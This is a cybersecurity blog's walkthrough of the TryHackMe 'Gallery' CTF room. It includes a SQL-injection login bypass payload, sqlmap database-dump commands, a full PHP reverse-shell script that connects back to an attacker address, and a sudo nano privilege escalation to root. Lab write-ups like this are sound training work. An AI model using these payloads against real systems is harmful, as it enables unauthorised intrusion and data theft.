<!DOCTYPE html>







<html lang="en"
  
    mode="dark"
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  

    <!-- i18n for `_javascript/utils/timeago.js` -->
    <meta name="day-prompt" content="days ago">
    <meta name="hour-prompt" content="hours ago">
    <meta name="minute-prompt" content="minutes ago">
    <meta name="justnow-prompt" content="just now">

    

    

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.2.1" />
<meta property="og:title" content="TryHackMe Gallery Writeup" />
<meta property="og:locale" content="en" />
<meta name="description" content="The THM room Gallery is an easy level CTF room created to test your skills in SQLi and exploiting known vulnerabilities." />
<meta property="og:description" content="The THM room Gallery is an easy level CTF room created to test your skills in SQLi and exploiting known vulnerabilities." />
<link rel="canonical" href="https://www.angry-byte.com/posts/THM-Gallery-Writeup/" />
<meta property="og:url" content="https://www.angry-byte.com/posts/THM-Gallery-Writeup/" />
<meta property="og:site_name" content="angry-byte.com" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-02-14T00:42:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="TryHackMe Gallery Writeup" />
<meta name="twitter:site" content="@angry_byte" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-02-14T00:42:00+08:00","datePublished":"2022-02-14T00:42:00+08:00","description":"The THM room Gallery is an easy level CTF room created to test your skills in SQLi and exploiting known vulnerabilities.","headline":"TryHackMe Gallery Writeup","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.angry-byte.com/posts/THM-Gallery-Writeup/"},"url":"https://www.angry-byte.com/posts/THM-Gallery-Writeup/"}</script>
<!-- End Jekyll SEO tag -->


  <title>TryHackMe Gallery Writeup | angry-byte.com
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="angry-byte.com">
<meta name="application-name" content="angry-byte.com">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
  

  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="https://cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="https://cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css">

  <!--
  CSS selector for site.
-->

<link rel="stylesheet" href="/assets/css/style.css">


  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">



  <!-- Manific Popup -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">



  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

</head>


  

  <body data-spy="scroll" data-target="#toc">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end" lang="en">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/" alt="avatar" class="mx-auto">
        
          
          <img src="/assets/images/logo.png" alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title mt-3">
      <a href="/">angry-byte.com</a>
    </div>
    <div class="site-subtitle font-italic">A cybersecurity blog</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/about/" class="nav-link">
        <i class="fa-fw  ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    

    
      

      
      <a href="https://github.com/angry-byte" aria-label="github"
        target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/angry_byte" aria-label="twitter"
        target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="
          javascript:location.href = 'mailto:' + ['contact','angry-byte.com'].join('@')" aria-label="email"
        >
        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/feed.xml" aria-label="rss"
        >
        <i class="fas fa-rss"></i>
      </a>
      

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">

    

    

      

        
          <span>
            <a href="/">
              Home
            </a>
          </span>

        

      

        

      

        

          
            <span>TryHackMe Gallery Writeup</span>
          

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        



<div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-8">
    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

    

    
      
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Add attribute 'hide-bullet' to the checkbox list -->



<!-- images -->




  
  

  
    
      
      
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  

  



<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      
      

      

    
      

      
      

      
      
      
      

      

    
      

      
      

      
      
      
      

      

    
      

      
      

      
      
      
      

      

    
      

      
      

      
      
      
      

      

    

    

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      
      

      

    

    

  

  
  

  

  
  

  




<!-- return -->







<h1 data-toc-skip>TryHackMe Gallery Writeup</h1>

<div class="post-meta text-muted">

  <!-- author -->
  <div>
    
    

    

    By
    <em>
      
        <a href="https://twitter.com/angry_byte">AngryByte</a>
      
    </em>
  </div>

  <div class="d-flex">
    <div>
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->





<em class="timeago"
    date="2022-02-14 00:42:00 +0800"
    
      data-toggle="tooltip"
      data-placement="bottom"
      title="Mon, Feb 14, 2022, 12:42 AM +0800"
    >Feb 14</em>

      </span>

      <!-- lastmod date -->
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="1378 words">
  <em>7 min</em> read</span>


      <!-- page views -->
      
    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p>The <a href="https://tryhackme.com/room/gallery666">THM room Gallery</a> is an easy level CTF room created to test your skills in SQLi and exploiting known vulnerabilities.</p>

<h2 id="recon">Recon<a href="#recon" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>Start with a simple port scan.</p>

<p><a href="/assets/images/post8/1.png"><img data-src="/assets/images/post8/1.png" alt="Port scan" data-proofer-ignore></a></p>

<p>Here we can see that there are two ports open on the system. So the answer to the first question in task 1 is 2. If we were to then visit the website, we would be shown a default page for Apache2 in Ubuntu. However, if we were to visit the website on port 8080, we would be redirected to a login page.</p>

<p><a href="/assets/images/post8/2.png"><img data-src="/assets/images/post8/2.png" alt="Login Page" data-proofer-ignore></a></p>

<p>The title above the login is “Simple Image Gallery System” which is a CMS used by the website and the answer to question 2 on task 1. Now let’s look for exploits that we can use.</p>

<p><a href="/assets/imapes/post8/3.png"><img data-src="/assets/images/post8/3.png" alt="Exploit-DB" data-proofer-ignore></a></p>

<p>On Exploit-DB, there are two notable vulnerabilities: an unauthenticated RCE and a SQLi. I did the RCE first, but because the next question asks what’s the admin user’s hash, we’ll first do the SQLi.</p>

<h2 id="exploitation---sqli">Exploitation - SQLi<a href="#exploitation---sqli" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>The POC has 5 steps to exploiting the vulnerable “id” parameter with SQLi:</p>
<ol>
  <li>Login to an account</li>
  <li>Click on the Albums page and select any album/create a new album</li>
  <li>Click on an image, capture the request burpsuite/ZAP, then export the raw request header into a file</li>
  <li>Run sqlmap with the command <code class="language-plaintext highlighter-rouge">sqlmap -r [FILENAME] --dbs</code></li>
  <li>At this point, the database names would be disclosed</li>
</ol>

<p>Starting with step 1, we need a valid user account. So how do we get get one? By using SQLi of course. If we go back and test the login page, we’d see that we can bypass it using SQLi. Entering a ‘ into the username would create the HTTP POST response:</p>

<p><code class="language-plaintext highlighter-rouge">{"status":"incorrect","last_qry":"SELECT * from users where username = ''' and password = md5('') "}</code></p>

<p>With the right payload, we can bypass authentication. For me, I used:  <code class="language-plaintext highlighter-rouge">admin' or '1'='1'#</code>
The login page for me was a little bugged. I had to reload, duplicate the login page, and repeatedly enter the SQLi payload because the page would just hang with the reloading animation but if you keep doing it, it’ll eventually get through.</p>

<p>Afterwards, follow steps 2 to 4 of the POC. When you run sqlmap, you will then be prompted to answer a series of questions. Just answer yes for the first 3 questions and then no to the fourth and final question.</p>

<p><a href="/assets/images/post8/4.png"><img data-src="/assets/images/post8/4.png" alt="sqlmap1" data-proofer-ignore></a></p>

<p>Now that we have the database name, we could dump all of it’s contents with the next command:</p>

<p><code class="language-plaintext highlighter-rouge">sqlmap -r gallery.raw -D gallery_db --dump</code></p>

<p>You will again be prompted to answer a few questions, to which you can just answer no to. Afterwards, you will then have the hash for the admin password and the answer to question 3 on task 1.</p>

<p><a href="/assets/images/post8/5.png"><img data-src="/assets/images/post8/5.png" alt="sqlmap2" data-proofer-ignore></a></p>

<p>I wasn’t able to crack the hash using online hash crackers or JTR. So now we move on to the next vulnerability.</p>

<h2 id="exploitation---rce">Exploitation - RCE<a href="#exploitation---rce" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>The way the RCE exploit works is that it abuses the SQLi vulnerability to bypass login and then uploads a PHP shell. To use this, we need to simply copy and paste the script onto our machine and then execute it with python3. We will be prompted for the target URL which is the path to the login page.</p>

<p><a href="/assets/images/post8/6.png"><img data-src="/assets/images/post8/6.png" alt="RCE" data-proofer-ignore></a></p>

<p>Copy the URL and visit the link and we’ll be see the output of the whoami command.</p>

<p><a href="/assets/imapes/post8/7.png"><img data-src="/assets/images/post8/7.png" alt="whoami output" data-proofer-ignore></a></p>

<p>The <em>cmd</em> parameter is used to execute commands. However it isn’t good enough because we’d need to URL encode every command we execute if we want to use something like space. So it would be better to use the RCE to create a reverse shell. We can do it in two ways. One is to create a URL encoded command that will send a connection to our machine. The second is to use a one line PHP shell as the payload string value in the RCE python script. I did the latter as I already had a PHP one line shell.</p>

<p><code class="language-plaintext highlighter-rouge">&lt;?php set_time_limit (0); $VERSION = "1.0"; $ip = "KALI"; $port = 443; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise.  This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 =&gt; array("pipe", "r"), 1 =&gt; array("pipe", "w"), 2 =&gt; array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) {  if (!$daemon) { print "$string\n"; } } ?&gt;</code></p>

<p>See where it says “KALI” and “443” in the beginning? Change those to your corresponding IP and desired port number. The shell also uses double quotation marks so be sure to wrap it into single quotation marks to make it a valid string value for payload in the Python script. Setup netcat, execute the script, copy and visit the link and now you have a reverse shell.</p>

<p><a href="/assets/images/post8/8.png"><img data-src="/assets/images/post8/8.png" alt="Reverse Shell" data-proofer-ignore></a></p>

<h2 id="privilege-escalation---www-data-to-mike">Privilege Escalation - www-data to mike<a href="#privilege-escalation---www-data-to-mike" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>With a little recon, we can see that user Mike has a backups folder.</p>

<p><a href="/assets/images/post8/9.png"><img data-src="/assets/images/post8/9.png" alt="Mike's Backup Folder" data-proofer-ignore></a></p>

<p>The documents directory contains the file accounts.txt with alleged accounts to Spotify, Netflix, and TryHackMe. However those are all red herrings. The real thing we’re looking for is in Mike’s bash command history. It seems Mike has made a mistake and entered his password as he was checking his sudo privileges.</p>

<p><a href="/assets/images/post8/10.png"><img data-src="/assets/images/post8/10.png" alt="Mike's Password" data-proofer-ignore></a></p>

<p>Now we got Mike’s password and can change to his account using <code class="language-plaintext highlighter-rouge">su</code>. However that would just lead to the following error being returned to us: <code class="language-plaintext highlighter-rouge">su: must be run from a terminal</code>. This error was returned to us because we need to make our shell more interactive. We can do this with Python3 and the command: <code class="language-plaintext highlighter-rouge">python3 -c 'import pty; pty.spawn("/bin/sh")'</code>.</p>

<p>Login using <code class="language-plaintext highlighter-rouge">su</code> into Mike’s account, then you can read user.txt in his directory.</p>

<p><a href="/assets/images/post8/11.png"><img data-src="/assets/images/post8/11.png" alt="user.txt" data-proofer-ignore></a></p>

<h2 id="privilege-escalation---mike-to-root">Privilege Escalation - mike to root<a href="#privilege-escalation---mike-to-root" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>If we check Mike’s sudo privileges, we see that he can run a certain script with sudo.</p>

<p><a href="/assets/images/post8/12.png"><img data-src="/assets/images/post8/12.png" alt="Mike's Privileges" data-proofer-ignore></a></p>

<p>What’s notable here in this script is that it uses <em>nano</em> when we select the read option. When nano is used by sudo, we can abuse it to execute commands with root privileges (<a href="https://gtfobins.github.io/gtfobins/nano/">nano on GTFO bins</a>).</p>

<p>If we try to execute nano using the script, we encounter another error: <code class="language-plaintext highlighter-rouge">Error opening terminal: unknown.</code> This occurs because our TERM environment variable isn't set. Executing <code class="language-plaintext highlighter-rouge">echo $TERM</code> would return the output “dumb”. We need to change it so we’ll set it to the value linux with the command: <code class="language-plaintext highlighter-rouge">export TERM=linux</code></p>

<p><a href="1/assets/images/post8/3.png"><img data-src="/assets/images/post8/13.png" alt="nano abuse1" data-proofer-ignore></a></p>

<p>Now we can execute nano. But it’s small and not taking the whole screen? Well then ctrl++ and now it’s bigger!</p>

<p><a href="/assets/images/post8/14.png"><img data-src="/assets/images/post8/14.png" alt="nano abuse2" data-proofer-ignore></a></p>

<p>According to GTFO bins, using nano and then pressing ctrl+r and then ctrl+x would bring a prompt to execute commands. However that wouldn’t work because once again, we need to tinker our reverse shell and stabilize it.</p>

<p>We just need to do two things. Background our shell by pressing ctrl+z and then execute <code class="language-plaintext highlighter-rouge">stty raw \-echo &amp;&amp; fg</code></p>

<p>This will stabilize the shell, but also make the terminal more laggy. Though we’re almost done because now you can either follow GTFO bins and spawn a shell with root privileges using <code class="language-plaintext highlighter-rouge">reset; sh 1&gt;&amp;0 2&gt;&amp;0</code> or just <code class="language-plaintext highlighter-rouge">cat /root/root.txt</code> and then you’ll have the root flag.</p>

<p><a href="/assets/images/post8/15.png"><img data-src="/assets/images/post8/15.png" alt="root.txt" data-proofer-ignore></a></p>

<h3 id="references">References<a href="#references" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3>

<ol>
  <li>
    <p>How to upgrade shells to be interactive by ropnop: <a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/">https://jasonturley.xyz/how-to-stabilize-a-reverse-shell/</a></p>
  </li>
  <li>
    <p>How to stabilize a reverse shell by Jason Turley: <a href="https://jasonturley.xyz/how-to-stabilize-a-reverse-shell/">https://jasonturley.xyz/how-to-stabilize-a-reverse-shell/</a></p>
  </li>
</ol>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories -->
  
  <div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i>
    
      <a href='/categories/writeups/'>Writeups</a>
  </div>
  

  <!-- tags -->
  
  <div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i>
      
      <a href="/tags/sqli/"
          class="post-tag no-text-decoration" >SQLi</a>
      
      <a href="/tags/ctf/"
          class="post-tag no-text-decoration" >CTF</a>
      
  </div>
  

  <div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">

      

        

        This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.

      
    </div>

    <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=TryHackMe Gallery Writeup - angry-byte.com&url=https://www.angry-byte.com/posts/THM-Gallery-Writeup/" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=TryHackMe Gallery Writeup - angry-byte.com&u=https://www.angry-byte.com/posts/THM-Gallery-Writeup/" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://telegram.me/share?text=TryHackMe Gallery Writeup - angry-byte.com&url=https://www.angry-byte.com/posts/THM-Gallery-Writeup/" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    

    <i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        title-succeed="Link copied successfully!">
    </i>

  </span>
</div>


  </div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->


      
    
    

    </div>
  </div> <!-- #core-wrapper -->

  <!-- pannel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

    <div class="access">
      















      















  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/ctf/">CTF</a>
    
      
      <a class="post-tag" href="/tags/tryhackme/">TryHackMe</a>
    
      
      <a class="post-tag" href="/tags/vulnerabilities/">Vulnerabilities</a>
    
      
      <a class="post-tag" href="/tags/linux/">Linux</a>
    
      
      <a class="post-tag" href="/tags/network-attacks/">Network-Attacks</a>
    
      
      <a class="post-tag" href="/tags/privilege-escalation/">Privilege-Escalation</a>
    
      
      <a class="post-tag" href="/tags/sqli/">SQLi</a>
    
      
      <a class="post-tag" href="/tags/web-attacks/">Web-Attacks</a>
    

    </div>
  </div>


    </div>

    
      
      



<!-- BS-toc.js will be loaded at medium priority -->
<script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div>


    
  </div>

</div>

<!-- tail -->

<div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">
      
        
        <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  
    
  

  

  

  

  

  


  

  

  

  

  

